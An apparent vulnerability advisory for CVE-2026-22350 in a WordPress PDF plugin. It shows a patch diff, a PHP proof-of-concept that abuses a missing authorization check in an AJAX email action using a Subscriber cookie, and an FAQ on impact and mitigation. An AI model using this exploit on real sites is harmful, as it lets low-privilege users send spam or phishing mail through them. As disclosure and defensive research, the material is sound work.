                                     <div class="builder__widget_tab builder__widget_genaral">
                                         <div class="builder__widget_tab_title"><span
-                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Genaral", "yeepdf") ?></span><span
+                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Genaral", "pdf-for-woocommerce") ?></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-down-alt2"></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span>
                                         </div>
@@ -298,7 +298,7 @@
                                 <div class="builder__widget--inner">
                                     <div class="builder__widget_tab builder__widget_columns">
                                         <div class="builder__widget_tab_title"><span
-                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Columns", "yeepdf") ?></span><span
+                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Columns", "pdf-for-woocommerce") ?></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-down-alt2"></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span>
@@ -319,11 +319,11 @@
                                 <div class="builder_main_footer_text">
                                     <a href="<?php echo esc_url(get_dashboard_url()) ?>"><span
                                             class="dashicons dashicons-arrow-left-alt"></span>
-                                        <?php esc_attr_e("BACK TO DASHBOARD", "yeepdf") ?></a>
+                                        <?php esc_attr_e("BACK TO DASHBOARD", "pdf-for-woocommerce") ?></a>
                                 </div>
                                 <div class="builder_main_footer_icon">
                                     <a href="#"
-                                        class="button button-primary yeepdf_button_settings"><?php esc_attr_e("SETTINGS", "yeepdf") ?></a>
+                                        class="button button-primary yeepdf_button_settings"><?php esc_attr_e("SETTINGS", "pdf-for-woocommerce") ?></a>
                                 </div>
                             </div>
                         </div>
@@ -332,7 +332,7 @@
             </div>
             <div class="email-builder-main" data-type="main">
                 <div class="email-builder-main-change_backgroud" data-type="main"><i class="pdf-creator-icon icon-pencil"></i>
-                    <?php esc_html_e("Settings PDF", "pdf-for-wpforms") ?></div>
+                    <?php esc_html_e("Settings PDF", 'pdf-for-woocommerce') ?></div>
                 <div class="builder__list builder__list--js">
                     <div class="builder-row-container builder__item">
                         <div style="background-color: #ffffff" data-background_full="not" data-type="row1"
@@ -347,10 +347,10 @@
         <?php
         $data_js = get_post_meta($post_id, 'data_email', true);
         if (is_array($data_js)) {
-            $data_js = json_encode($data_js);
+            $data_js = wp_json_encode($data_js);
         }
         ?>
-        <textarea name="data_email" class="data_email hidden"><?php echo esc_attr($data_js) ?></textarea>
+        <textarea name="data_email" class="data_email hidden"><?php echo esc_textarea($data_js) ?></textarea>
         <script type="text/javascript">
             <?php
             $data = array();
@@ -375,7 +375,8 @@
         }
         $add_libs = apply_filters("yeepdf_add_libs", $add_libs);
         if ($add_libs) {
-            $ver = time();
+            $ver = "6.5.0";
+            //$ver = time();
             wp_enqueue_script('jquery');
             wp_enqueue_style('yeepdf-font', YEEPDF_CREATOR_BUILDER_URL . "backend/css/pdfcreator.css", array(), $ver);
             wp_enqueue_style('yeepdf-momonga', YEEPDF_CREATOR_BUILDER_URL . "backend/css/momonga.css", array("wp-jquery-ui-dialog", "wp-color-picker"), $ver);
@@ -422,7 +423,7 @@
                 'yeepdf_script',
                 array(
                     'ajax_url' => admin_url('admin-ajax.php'),
-                    'youtube_play_src' => "pdf-for-wpforms" . "images/youtube_play.png",
+                    'youtube_play_src' => 'pdf-for-woocommerce' . "images/youtube_play.png",
                     'yeepdf_url_plugin' => YEEPDF_CREATOR_BUILDER_URL,
                     'shortcodes' =>  $shortcodes,
                     'google_font_font_formats' => $font_formats,
@@ -450,7 +451,7 @@
                     font-style: normal;
                     font-weight: 400;
                     font-display: block;
-                    src: url(<?php echo esc_url(YEEPDF_CREATOR_BUILDER_PATH) ?>"vendor/mpdf/mpdf/ttfonts/fontawesome.ttf") format("truetype");
+                    src: url(<?php echo esc_url(YEEPDF_CREATOR_BUILDER_URL) ?>"vendor/mpdf/mpdf/ttfonts/fontawesome.ttf") format("truetype");
                 }
                 .fontawesome {
                     font-family: "fontawesome";
@@ -524,15 +525,17 @@
             'yeepdf',
             array(
                 'labels' => array(
-                    'name' => esc_html__('PDF Templates', "pdf-for-wpforms"),
-                    'add_new' => esc_html__('New Template', "pdf-for-wpforms"),
-                    'singular_name' => esc_html__('yeepdfs', "pdf-for-wpforms")
+                    'name' => esc_html__('PDF Templates', 'pdf-for-woocommerce'),
+                    'add_new' => esc_html__('New Template', 'pdf-for-woocommerce'),
+                    'new_item' => esc_html__('New Template', 'pdf-for-woocommerce'),
+                    'add_new_item' => esc_html__('New Template', 'pdf-for-woocommerce'),
+                    'singular_name' => esc_html__('yeepdfs', 'pdf-for-woocommerce')
                 ),
-                'public' => true,
+                'public' => false,
                 'has_archive' => true,
                 'supports'    => array('title'),
                 'show_in_menu' => true,
-                'rewrite' => array('slug' => 'yeepdf'),
+                'show_ui' => true,
                 'show_in_rest' => true,
                 'menu_icon'           => 'dashicons-email',
                 'menu_position' => 100,
@@ -542,21 +545,112 @@
             )
         );
     }
+    function yeepdf_allow_custom_css($styles)
+    {
+        $styles[] = 'position';
+        $styles[] = 'z-index';
+        $styles[] = 'top';
+        $styles[] = 'right';
+        $styles[] = 'bottom';
+        $styles[] = 'left';
+        $styles[] = 'width';
+        $styles[] = 'min-width';
+        $styles[] = 'max-width';
+        $styles[] = 'height';
+        $styles[] = 'min-height';
+        $styles[] = 'max-height';
+        $styles[] = 'display';
+        $styles[] = 'overflow';
+        $styles[] = 'float';
+        $styles[] = 'clear';
+        $styles[] = 'margin';
+        $styles[] = 'margin-top';
+        $styles[] = 'margin-right';
+        $styles[] = 'margin-bottom';
+        $styles[] = 'margin-left';
+        $styles[] = 'padding';
+        $styles[] = 'padding-top';
+        $styles[] = 'padding-right';
+        $styles[] = 'padding-bottom';
+        $styles[] = 'padding-left';
+
+        $styles[] = 'border';
+        $styles[] = 'border-collapse';
+        $styles[] = 'border-top';
+        $styles[] = 'border-right';
+        $styles[] = 'border-bottom';
+        $styles[] = 'border-left';
+        $styles[] = 'border-radius';
+        $styles[] = 'border-color';
+        $styles[] = 'border-style';
+        $styles[] = 'border-width';
+        $styles[] = 'background';
+        $styles[] = 'background-color';
+        $styles[] = 'background-image'; // Lưu ý: WP sẽ tự check URL bên trong cái này để chặn link độc
+        $styles[] = 'color';
+        $styles[] = 'opacity';
+        $styles[] = 'box-shadow';
+        $styles[] = 'font-family';
+        $styles[] = 'font-size';
+        $styles[] = 'font-weight';
+        $styles[] = 'font-style';
+        $styles[] = 'text-align';
+        $styles[] = 'text-transform';
+        $styles[] = 'text-decoration';
+        $styles[] = 'line-height';
+        $styles[] = 'letter-spacing';
+        $styles[] = 'white-space';
+        $styles[] = 'cursor';
+        $styles[] = 'vertical-align';
+        return $styles;
+    }
     function save_metabox($post_id, $post)
     {
+        if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) {
+            return;
+        }
+        if (wp_is_post_autosave($post_id) || wp_is_post_revision($post_id)) {
+            return;
+        }
+        if (!($post instanceof WP_Post) || $post->post_type !== 'yeepdf') {
+            return;
+        }
+        if (!current_user_can('edit_post', $post_id)) {
+            return;
+        }
+        if (!isset($_POST['_yeepdf_check_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['_yeepdf_check_nonce'])), '_yeepdf_check_nonce')) {
+            return;
+        }
         if (isset($_POST['data_email'])) {
-            $data_email = ($_POST['data_email']);
-            update_post_meta($post_id, 'data_email', $data_email);
+            $raw = wp_unslash($_POST['data_email']);
+            $raw = is_string($raw) ? trim($raw) : '';
+            if ($raw !== '') {
+                $decoded = json_decode($raw, true);
+                // Only accept valid JSON (array/object). Reject scalars and invalid JSON.
+                if (json_last_error() === JSON_ERROR_NONE && is_array($decoded)) {
+                    //add_filter('safe_style_css', array($this, 'yeepdf_allow_custom_css'));
+                    //$clean_data = map_deep($decoded, 'wp_kses_post');
+                    $clean_data = $decoded;
+                    //remove_filter('safe_style_css', array($this, 'yeepdf_allow_custom_css'));
+                    update_post_meta($post_id, 'data_email', $clean_data);
+                } else {
+                    // Invalid JSON - don't overwrite existing stored template.
+                    error_log('YeePDF: invalid JSON received for data_email on post_id=' . absint($post_id));
+                }
+            } else {
+                // Empty value clears the meta.
+                error_log('YeePDF: invalid JSON received for data_email on post_id=' . absint($post_id));
+            }
         }
         if (isset($_POST['builder_pdf_settings_font_family'])) {
-            $builder_pdf_settings_font_family = sanitize_text_field($_POST['builder_pdf_settings_font_family']);
+            $builder_pdf_settings_font_family = sanitize_text_field(wp_unslash($_POST['builder_pdf_settings_font_family']));
             update_post_meta($post_id, '_builder_pdf_settings_font_family', $builder_pdf_settings_font_family);
         }
         if (isset($_POST['builder_pdf_settings'])) {
             $datas = array();
-            if (array($_POST["builder_pdf_settings"])) {
+            if (is_array($_POST["builder_pdf_settings"])) {
                 foreach ($_POST["builder_pdf_settings"] as $key => $value) {
-                    $datas[$key] = sanitize_textarea_field($value);
+                    $datas[sanitize_key($key)] = sanitize_textarea_field(wp_unslash($value));
                 }
                 update_post_meta($post_id, '_builder_pdf_settings', $datas);
             }
@@ -575,7 +669,7 @@
     {
         add_meta_box(
             'email-builder-main',
-            esc_html__('Builder PDF', "pdf-for-wpforms"),
+            esc_html__('Builder PDF', 'pdf-for-woocommerce'),
             array($this, 'email_builder_main'),
             'yeepdf',
             'normal',
@@ -684,17 +778,17 @@
             <img src="<?php echo esc_url($args["img"]) ?>">
             <div class="demo_content">
                 <div class="demo-title"><?php echo esc_html($args["title"]) ?></div>
-                <div class="demo-tags"><?php echo implode(", ", $args["cat"]) ?></div>
+                <div class="demo-tags"><?php echo esc_html(implode(", ", $args["cat"])) ?></div>
                 <div class="yeepdf-email-actions">
                     <div class="demo-fl">
                         <a class="button yeepdf-email-actions-import"
-                            href="#"><?php esc_html_e("Import", "pdf-for-wpforms") ?></a>
+                            href="#"><?php esc_html_e("Import", 'pdf-for-woocommerce') ?></a>
                         <a target="_blank" class="button yeepdf-email-actions-design"
-                            href="<?php echo esc_url($url_design) ?>"><?php esc_html_e("Design", "pdf-for-wpforms") ?></a>
+                            href="<?php echo esc_url($url_design) ?>"><?php esc_html_e("Design", 'pdf-for-woocommerce') ?></a>
                     </div>
                     <div class="demo-fr">
                         <a target="_blank" class="button yeepdf-email-actions-view"
-                            href="<?php echo esc_url($url_view) ?>"><?php esc_html_e("Preview", "pdf-for-wpforms") ?></a>
+                            href="<?php echo esc_url($url_view) ?>"><?php esc_html_e("Preview", 'pdf-for-woocommerce') ?></a>
                     </div>
                     <div class="clear"></div>
                 </div>
--- a/pdf-for-elementor-forms/backend/settings.php
+++ b/pdf-for-elementor-forms/backend/settings.php
@@ -1,180 +1,217 @@
 <?php
-if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+if (! defined('ABSPATH')) exit; // Exit if accessed directly
 global $yeepdf_settings_main;
-class Yeepdf_Settings_Main {
+class Yeepdf_Settings_Main
+{
 	private $notices = array();
-	function __construct() {
-		add_action( 'admin_menu', array( $this, 'add_plugin_page' ) );
-		add_action( 'wp_ajax_pdfceator_remove_font', array($this,"remove_font"));
-		add_action( 'yeepdf_custom_sizes', array($this,"add_sizes"));
-		add_action( 'admin_init', array( $this, 'plugins_loaded' ) );
-		add_action( 'wp_ajax_yeepdf_dropbox_client_id_validate', [ $this, 'ajax_validate_api_token' ] );
-		add_action( "yeepdf_after_settings", array($this,"yeepdf_after_settings"),10);
-	}
-	function yeepdf_after_settings(){
-		?>
+	function __construct()
+	{
+		add_action('admin_menu', array($this, 'add_plugin_page'));
+		add_action('wp_ajax_yeepdf_remove_font', array($this, "remove_font"));
+		add_action('yeepdf_custom_sizes', array($this, "add_sizes"));
+		add_action('admin_init', array($this, 'plugins_loaded'));
+		add_action('wp_ajax_yeepdf_dropbox_client_id_validate', [$this, 'ajax_validate_api_token']);
+		add_action("yeepdf_after_settings", array($this, "yeepdf_after_settings"), 10);
+		add_filter('upload_mimes', array($this, 'custom_upload_mimes'));
+	}
+	function custom_upload_mimes($mimes)
+	{
+		$mimes['ttf'] = 'application/x-font-ttf';
+		return $mimes;
+	}
+	function yeepdf_after_settings()
+	{
+?>
 		<tr valign="top">
-			<th scope="row"><?php esc_html_e("Save PDF to Dropbox","pdf-for-wpforms") ?>
+			<th scope="row"><?php esc_html_e("Save PDF to Dropbox", 'pdf-for-woocommerce') ?>
 			</th>
 			<td>
 				<div class="pro_disable pro_disable_fff">
-					Upgrade to pro version
+					<?php
+					esc_html_e('Upgrade to pro version', 'pdf-for-woocommerce');
+					?>
 				</div>
 			</td>
 		</tr>
-		<?php
+	<?php
+	}
+	function ajax_validate_api_token()
+	{
+		check_ajax_referer("yeepdf_dropbox", '_nonce');
+		$clientId = sanitize_text_field(wp_unslash($_POST['clientId']));
+		$clientSecret = sanitize_text_field(wp_unslash($_POST['clientSecret']));
+		$authorizationCode = sanitize_text_field(wp_unslash($_POST['authorizationCode']));
+		if (! isset($_POST['clientId'])) {
+			wp_send_json_error();
+		}
+		if (! current_user_can('manage_options')) {
+			wp_send_json_error('Permission denied');
+		}
+		try {
+			$datas = Yeepdf_Dropbox_API::get_token($clientId, $clientSecret, $authorizationCode);
+			if ($datas == "ok") {
+				wp_send_json_success($datas);
+			} else {
+				wp_send_json_error($datas);
+			}
+		} catch (Exception $exception) {
+			wp_send_json_error();
+		}
+		wp_send_json_success();
 	}
-	function ajax_validate_api_token(){
-		check_ajax_referer( "yeepdf_dropbox", '_nonce' );
-        $clientId = sanitize_text_field(wp_unslash($_POST['clientId']));
-        $clientSecret = sanitize_text_field(wp_unslash($_POST['clientSecret']));
-        $authorizationCode = sanitize_text_field(wp_unslash($_POST['authorizationCode']));
-        if ( ! isset( $_POST['clientId'] ) ) {
-            wp_send_json_error();
-        }
-        if ( ! current_user_can( 'manage_options' ) ) {
-            wp_send_json_error( 'Permission denied' );
-        }
-        try {
-           $datas = Yeepdf_Dropbox_API::get_token($clientId,$clientSecret,$authorizationCode);
-           if($datas == "ok"){
-                wp_send_json_success($datas);
-           }else{
-                wp_send_json_error($datas);
-           }
-        } catch ( Exception $exception ) {
-            wp_send_json_error();
-        }
-        wp_send_json_success();
-	}
-	public static function generateRandomString($length = 15) {
-	    $characters = '0123456789abcdefghijklmnopqrstuvwxyz_';
-	    $charactersLength = strlen($characters);
-	    $randomString = '';
-	    for ($i = 0; $i < $length; $i++) {
-	        $randomString .= $characters[random_int(0, $charactersLength - 1)];
-	    }
-	    return $randomString;
-	}
-	public static function maybe_get_random_dir() {
-		$settings_folder = get_option("pdf_creator_save_folder","pdfs/downloads");
-		$uploads_folder = apply_filters("yeepdf_folder_download",$settings_folder);
-		$uploads_folder = rtrim($uploads_folder, "/\");
+	public static function generateRandomString($length = 15)
+	{
+		$characters = '0123456789abcdefghijklmnopqrstuvwxyz_';
+		$charactersLength = strlen($characters);
+		$randomString = '';
+		for ($i = 0; $i < $length; $i++) {
+			$randomString .= $characters[random_int(0, $charactersLength - 1)];
+		}
+		return $randomString;
+	}
+	public static function maybe_get_random_dir()
+	{
+		$settings_folder = get_option("pdf_creator_save_folder", "pdfs/downloads");
+		$uploads_folder = apply_filters("yeepdf_folder_download", $settings_folder);
+		$uploads_folder = ltrim($uploads_folder, "/\");
+		if (strpos($uploads_folder, '..') !== false) {
+			$uploads_folder = 'pdfs/downloads';
+		}
 		return $uploads_folder;
-	}
-	public static function maybe_add_random_dir() {
+	}
+	public static function maybe_add_random_dir()
+	{
 		$upload_dir = wp_upload_dir();
 		$uploads_folder = self::maybe_get_random_dir();
-		$dir = $upload_dir['basedir'] . '/'.$uploads_folder.'/';
-		$url = $upload_dir['baseurl'] . '/'.$uploads_folder.'/';
-		$settings_folder = get_option("pdf_creator_save_random","");
-		$disable_random = apply_filters("yeepdf_disable_random_folder",$settings_folder);
-		if($disable_random != "yes" ){
+		$dir = $upload_dir['basedir'] . '/' . $uploads_folder . '/';
+		$url = $upload_dir['baseurl'] . '/' . $uploads_folder . '/';
+		$settings_folder = get_option("pdf_creator_save_random", "");
+		$disable_random = apply_filters("yeepdf_disable_random_folder", $settings_folder);
+		if ($disable_random != "yes") {
 			do {
 				$rand_max = mt_getrandmax();
 				$rand = self::generateRandomString();
-				$dir_new = path_join( $dir, $rand );
-				$url_new = $url.$rand;
-			} while ( file_exists( $dir_new ) );
-			if ( wp_mkdir_p( $dir_new ) ) {
-				return array("path"=>$dir_new."/","url"=>$url_new."/");
-			}
-			return array("path"=>$dir,"url"=>$url);
-		}else{
-			if ( wp_mkdir_p( $dir ) ) {
-				return array("path"=>$dir,"url"=>$url);
-			}
-			return array("path"=>$dir,"url"=>$url);
-		}
-	}
-	public static function destroy_all_files($dirPath=null) {
-		if(!$dirPath) {
-			$upload_dir = wp_upload_dir();
+				$dir_new = path_join($dir, $rand);
+				$url_new = $url . $rand;
+			} while (file_exists($dir_new));
+			if (wp_mkdir_p($dir_new)) {
+				return array("path" => $dir_new . "/", "url" => $url_new . "/");
+			}
+			return array("path" => $dir, "url" => $url);
+		} else {
+			if (wp_mkdir_p($dir)) {
+				return array("path" => $dir, "url" => $url);
+			}
+			return array("path" => $dir, "url" => $url);
+		}
+	}
+	public static function destroy_all_files($dirPath = null)
+	{
+		global $wp_filesystem;
+		if (! $wp_filesystem) {
+			require_once ABSPATH . 'wp-admin/includes/file.php';
+			WP_Filesystem();
+		}
+		$upload_dir = wp_upload_dir();
+		$basedir    = wp_normalize_path($upload_dir['basedir']);
+		//dirPath → set default
+		if (empty($dirPath)) {
 			$uploads_folder = self::maybe_get_random_dir();
-			$dirPath = $upload_dir['basedir'] . '/'.$uploads_folder.'/';
-			if (! is_dir($dirPath)) {
-				//throw new InvalidArgumentException("$dirPath must be a directory");
-			}
-			if (substr($dirPath, strlen($dirPath) - 1, 1) != '/') {
-				$dirPath .= '/';
-			}
+			$dirPath = trailingslashit($upload_dir['basedir'] . '/' . $uploads_folder);
+		}
+		$dirPath = wp_normalize_path($dirPath);
+		// CHECK
+		if (strpos($dirPath, $basedir) !== 0) {
+			return;
+		}
+		if (! is_dir($dirPath)) {
+			return;
 		}
-		$dirPath = rtrim($dirPath, '/') . '/';
 		$items = scandir($dirPath);
 		foreach ($items as $item) {
-			if ($item === '.' || $item === '..') continue;
-			$path = $dirPath . $item;
+			if ($item === '.' || $item === '..') {
+				continue;
+			}
+			$path = $dirPath . '/' . $item;
 			if (is_dir($path)) {
 				self::destroy_all_files($path);
 			} else {
-				unlink($path);
+				wp_delete_file($path);
 			}
 		}
-		rmdir($dirPath);
+		$wp_filesystem->rmdir($dirPath, true);
 	}
-	public function plugins_loaded() {
+	public function plugins_loaded()
+	{
 		$this->check_mb_string();
 		$this->check_mb_string_regex();
 		$this->check_gd();
 		$this->check_dom();
-		$this->check_ram( ini_get( 'memory_limit' ) );
-		if ( count( $this->notices ) > 0 ) {
-			add_action( 'admin_notices', array( $this, 'display_notices' ) );
+		$this->check_ram(ini_get('memory_limit'));
+		if (count($this->notices) > 0) {
+			add_action('admin_notices', array($this, 'display_notices'));
 		}
 	}
-	public function display_notices() {
-		?>
+	public function display_notices()
+	{
+	?>
 		<div class="error">
-			<p><strong><?php esc_html_e( 'PDF Installation Problem', 'pdf-for-wpforms' ); ?></strong></p>
-			<p><?php esc_html_e( 'The minimum requirements for PDF have not been met. Please fix the issue(s) below to use the plugin:', 'pdf-for-wpforms' ); ?></p>
+			<p><strong><?php esc_html_e('PDF Installation Problem', 'pdf-for-woocommerce'); ?></strong></p>
+			<p><?php esc_html_e('The minimum requirements for PDF have not been met. Please fix the issue(s) below to use the plugin:', 'pdf-for-woocommerce'); ?></p>
 			<ul>
-			<?php foreach ( $this->notices as $notice ): ?>
-				<li style="padding-left: 15px;"><?php echo wp_kses_post( $notice ); ?></li>
-			<?php endforeach; ?>
-		</ul>
+				<?php foreach ($this->notices as $notice): ?>
+					<li style="padding-left: 15px;"><?php echo wp_kses_post($notice); ?></li>
+				<?php endforeach; ?>
+			</ul>
 		</div>
-		<?php
+	<?php
 	}
-	public function check_mb_string() {
-		if ( ! extension_loaded( 'mbstring' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension MB String could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_mb_string()
+	{
+		if (! extension_loaded('mbstring')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension MB String could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_mb_string_regex() {
-		if ( extension_loaded( 'mbstring' ) && ! function_exists( 'mb_regex_encoding' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension MB String does not have MB Regex enabled. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_mb_string_regex()
+	{
+		if (extension_loaded('mbstring') && ! function_exists('mb_regex_encoding')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension MB String does not have MB Regex enabled. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_gd() {
-		if ( ! extension_loaded( 'gd' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension GD Image Library could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_gd()
+	{
+		if (! extension_loaded('gd')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension GD Image Library could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_dom() {
-		if ( ! extension_loaded( 'dom' ) || ! class_exists( 'DOMDocument' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP DOM Extension was not found. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_dom()
+	{
+		if (! extension_loaded('dom') || ! class_exists('DOMDocument')) {
+			$this->notices[] = sprintf(esc_html__('The PHP DOM Extension was not found. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
-		if ( ! extension_loaded( 'libxml' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension libxml could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+		if (! extension_loaded('libxml')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension libxml could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_ram( $ram ) {
-		$memory_limit = $this->convert_ini_memory( $ram );
-		$ram = ( $memory_limit === '-1' ) ? -1 : floor( $memory_limit / 1024 / 1024 );
-		if ( $ram < 64 && $ram !== -1 ) {
-			$this->notices[] = sprintf( esc_html__( 'You need %1$s128MB%2$s of WP Memory (RAM) but we only found %3$s available. %4$sTry these methods to increase your memory limit%5$s, otherwise contact your web hosting provider to fix.', 'pdf-for-wpforms' ), '<strong>', '</strong>', $ram . 'MB', '<a href="https://pdf.add-ons.org/how-to-increase-your-wordpress-memory-limit-for-pdf/">', '</a>' );
+	public function check_ram($ram)
+	{
+		$memory_limit = $this->convert_ini_memory($ram);
+		$ram = ($memory_limit

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-22350 - PDF for Elementor Forms + Drag And Drop Template Builder <= 6.3.1 - Missing Authorization

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$cookie = 'wordpress_logged_in_abc=...'; // Valid auth cookie for a Subscriber user

// Prepare the POST data for the vulnerable action
$post_data = array(
    'action' => 'yeepdf_builder_send_email_testing',
    'id'     => '123', // Any post ID
    'email'  => 'attacker@example.com'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'Cookie: ' . $cookie
));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check response
if ($http_code == 200 && strpos($response, 'Sent email') !== false) {
    echo "[+] Exploit successful. Test email sent.n";
    echo "Response: $responsen";
} else {
    echo "[-] Exploit failed or endpoint not vulnerable.n";
    echo "HTTP Code: $http_coden";
    echo "Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-22350?
Understanding the vulnerability
CVE-2026-22350 is a medium severity vulnerability in the PDF for Elementor Forms plugin for WordPress. It is caused by a missing authorization check in the ‘yeepdf_builder_send_email_testing’ function, allowing authenticated users with Subscriber-level access or higher to send test emails without proper permissions.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability allows authenticated attackers to send a POST request to the WordPress AJAX handler, triggering the sending of emails through the site. Since there are no capability checks in place, any authenticated user can exploit this function to send emails, potentially leading to spam or phishing attacks.
Who is affected by this vulnerability?
Identifying impacted users
All users of the PDF for Elementor Forms plugin versions up to and including 6.3.1 are affected. This includes any WordPress site where the plugin is installed, particularly those with authenticated users who have Subscriber-level access or higher.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the PDF for Elementor Forms plugin installed. If it is version 6.3.1 or earlier, your site is at risk. You can find the version in the WordPress admin panel under ‘Plugins’.
How can I fix this vulnerability?
Applying the necessary patch
The vulnerability is fixed in version 6.5.0 of the PDF for Elementor Forms plugin. Update your plugin to this version or later to mitigate the risk. Ensure to regularly check for updates to maintain security.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider temporarily disabling the PDF for Elementor Forms plugin to prevent exploitation. Additionally, review user roles and limit access to authenticated users where feasible.
What does the CVSS score of 4.3 mean?
Interpreting the severity rating
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for remote code execution or privilege escalation, it still poses a significant risk due to the potential for unauthorized actions that could lead to spam or phishing.
How does the proof of concept demonstrate the issue?
Understanding the exploit example
The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint. It illustrates the ease of exploitation using a valid authentication cookie, highlighting the lack of authorization checks.
What are the potential consequences of exploitation?
Risks associated with the vulnerability
If exploited, this vulnerability could allow attackers to send arbitrary emails from the site, potentially leading to spam, phishing campaigns, or harassment. This could also result in the site’s email server being blacklisted if the functionality is abused.
Is there a way to monitor for exploitation attempts?
Implementing monitoring strategies
Yes, you can monitor your server logs for unusual POST requests to the admin-ajax.php endpoint. Additionally, consider using security plugins that offer logging and alerting features for suspicious activity related to AJAX requests.
What should I do if I suspect my site has been exploited?
Responding to a potential breach
If you suspect exploitation, immediately disable the affected plugin and review your email logs for any unauthorized activity. Change passwords for all user accounts and consider conducting a full security audit to ensure no other vulnerabilities exist.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations